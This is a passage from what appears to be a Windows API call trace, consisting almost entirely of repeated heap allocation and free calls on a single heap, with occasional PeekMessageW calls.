(HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0097.006] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301d0 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fdc0 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330798 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330540 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.006] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 